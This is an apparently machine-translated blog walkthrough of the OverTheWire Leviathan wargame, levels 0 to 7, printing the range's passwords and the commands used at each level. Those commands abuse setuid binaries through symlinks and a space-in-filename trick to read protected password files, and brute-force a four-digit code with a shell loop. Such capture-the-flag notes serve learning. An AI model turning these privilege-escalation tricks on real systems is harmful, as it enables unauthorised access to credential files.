当前位置:网站首页>Wargames study notes -- Leviathan
Wargames study notes -- Leviathan
2022-07-03 20:05:00 【Zhaohg720】
Range link :https://overthewire.org/wargames/leviathan/
Level 0
Username: leviathan0
Password: leviathan0
Level 0 --> Level 1
Sign in leviathan0
Home catalog
ls -a
Found a hidden directory .backup
, There is one in the catalog html file Copy the file locally and open it with a browser , Search for password Found the password
Not Found
The requested URL /passwordus.html | This will be fixed later, the password for leviathan1 is rioGegei8m was not found on this server.
Apache/2.4.10 (Debian) Server at leviathan.labs.overthewire.org Port 80
Level 1 --> Level 2
Sign in leviathan1
There is an executable file in the home directory
check
, Password is required for running prompt direct scp Drag to local ida Look at

The key part is to combine the input string with
sex
compare , If it is successful, it will execute shell stay password Enter password /bin/sh This shell, Find that you already have leviathan2 Authority , direct cat The password will do
[email protected]:~$ ./check
password: sex
$ id
uid=12002(leviathan2) gid=12001(leviathan1) groups=12001(leviathan1)
$ cat /etc/leviathan_pass/leviathan2
ougahZi8Ta
$
Level 2 --> Level 3
Sign in leviathan2
The home directory has an executable
printfile
, You should be able to read the password directly according to the prompt [email protected]:~$ ./printfile
*** File Printer ***
Usage: ./printfile filename
[email protected]:~$ ls -l
total 8
-r-sr-x--- 1 leviathan3 leviathan2 7436 Aug 26 2019 printfile
Directly print password file prompt file without this file , Look at the source code
The key here is to use access() This function checks the file name and type of the file , So we should bypass this check , Print the input directly , You can create a soft link to a password file , Create a file with spaces at the beginning of the soft link name , And then execute the command ,access() Check is a file ,cat The execution of will be divided into two files cat To password
mkdir /tmp/leviathan2
cd /tmp/leviathan2
ln -s /etc/leviathan_pass/leviathan3 getpass
touch "getpass 1.txt"
~/printfile getpass\ 1.txt
Level 3 --> Level 4
Sign in leviathan4
It is very similar to the previous question

What is in the main function , The content is do_stuff() In this function

Obviously , The comparison string is snlprintf, The same thing get shell
./level3
Enter the password> snlprintf
[You've got shell]!
$ id
uid=12004(leviathan4) gid=12003(leviathan3) groups=12003(leviathan3)
$ cat /etc/leviathan_pass/leviathan4
Level 4 --> Level 5
Sign in leviathan5
A hidden Directory
.trash
, There's a bin
Executable file [email protected]:~$ ls -la
total 24
drwxr-xr-x 3 root root 4096 Aug 26 2019 .
drwxr-xr-x 10 root root 4096 Aug 26 2019 ..
-rw-r--r-- 1 root root 220 May 15 2017 .bash_logout
-rw-r--r-- 1 root root 3526 May 15 2017 .bashrc
-rw-r--r-- 1 root root 675 May 15 2017 .profile
dr-xr-x--- 2 root leviathan4 4096 Aug 26 2019 .trash
[email protected]:~/.trash$ ltrace ./bin
__libc_start_main(0x80484bb, 1, 0xffffd774, 0x80485b0 <unfinished ...>
fopen("/etc/leviathan_pass/leviathan5", "r") = 0
+++ exited (status 255) +++
[email protected]:~/.trash$ ./bin
01010100 01101001 01110100 01101000 00110100 01100011 01101111 01101011 01100101 01101001 00001010
The output of direct execution is the binary of password , as long as 2 Turn into the system ascii Can
b_password = '01010100 01101001 01110100 01101000 00110100 01100011 01101111 01101011 01100101 01101001 00001010'
list_pasword = b_password.split(' ')
password = []
for i in range(0, len(list_pasword)):
password += chr(int(list_pasword[i], 2))
# print(int(list_pasword[i], 2))
print(password)
Level 5 --> Level 6
Sign in leviathan6
There is an executable program , direct ida to glance at

It's reading /tmp/file.log The content of the document , This file does not exist . So you can still use the soft link method
ln -s /etc/leviathan_pass/leviathan6 /tmp/file.log
Direct execution ./leviathan5
Then the password will be displayed
Level 6 --> Level 7
Sign in leviathan6
[email protected]:~$ ./leviathan6
usage: ./leviathan6 <4 digit code>
Prompt to add four digits , Obviously want us to explode . Because the file on the target is deleted in a short time, which is inconvenient to operate , So copy the file locally , use shell Script explosion
#!/bin/bash
for i in {
1000..9999}
do
/root/Desktop/leviathan6 $i
echo $i
done
Wrong
7122
# ^C
# id
uid=0(root) gid=0(root) groups=0(root)
# ^C
#
You can see the execution to 7123 Enter shell, So input directly on the target 7123 then cat The password will do
[email protected]:~$ ./leviathan6 7123
$ cat /etc/leviathan_pass/leviathan7
边栏推荐
- Teach you how to quickly recover data by deleting recycle bin files by mistake
- Chapter 2: find the classical solution of the maximum Convention and the least common multiple of a and B, find the conventional solution of the maximum Convention and the least common multiple of a a
- Popularize the basics of IP routing
- Parental delegation mechanism
- BOC protected tryptophan zinc porphyrin (Zn · TAPP Trp BOC) / copper porphyrin (Cu · TAPP Trp BOC) / cobalt porphyrin (cobalt · TAPP Trp BOC) / iron porphyrin (Fe · TAPP Trp BOC) / Qiyue supply
- 2.4 conversion of different data types
- Make a simple text logo with DW
- Phpstudy set LAN access
- Class loading process
- Strict data sheet of new features of SQLite 3.37.0
猜你喜欢
Virtual machine installation deepin system
Native table - scroll - merge function
Chapter 1: find the factorial n of n!
Chapter 1: King Shehan miscalculated
Chapter 1: recursively find the factorial n of n!
Point cloud data denoising
HCIA-USG Security Policy
CesiumJS 2022^ 源码解读[7] - 3DTiles 的请求、加载处理流程解析
Xctf attack and defense world crypto master advanced area olddriver
Cesiumjs 2022 ^ source code interpretation [7] - Analysis of the request and loading process of 3dfiles
随机推荐
[effective Objective-C] - block and grand central distribution
Bool blind note - score query
Micro service knowledge sorting - asynchronous communication technology
Exercises of function recursion
Rd file name conflict when extending a S4 method of some other package
Typora charges, WTF? Still need support
Nerfplusplus parameter format sorting
44. Concurrent programming theory
About callback function and hook function
Global and Chinese market of electrolyte analyzers 2022-2028: Research Report on technology, participants, trends, market size and share
Professional interpretation | how to become an SQL developer
BOC protected tryptophan porphyrin compound (TAPP Trp BOC) Pink Solid 162.8mg supply - Qiyue supply
Xctf attack and defense world crypto master advanced area olddriver
Gym welcomes the first complete environmental document, which makes it easier to get started with intensive learning!
7. Data broker presentation
Assign the CMD command execution result to a variable
Geek Daily: the system of monitoring employees' turnover intention has been deeply convinced off the shelves; The meta universe app of wechat and QQ was actively removed from the shelves; IntelliJ pla
Microservice knowledge sorting - search technology and automatic deployment technology
2022-06-28 advanced network engineering (XIII) IS-IS route filtering, route summary, authentication, factors affecting the establishment of Isis neighbor relations, other commands and characteristics
NFT without IPFs and completely on the chain?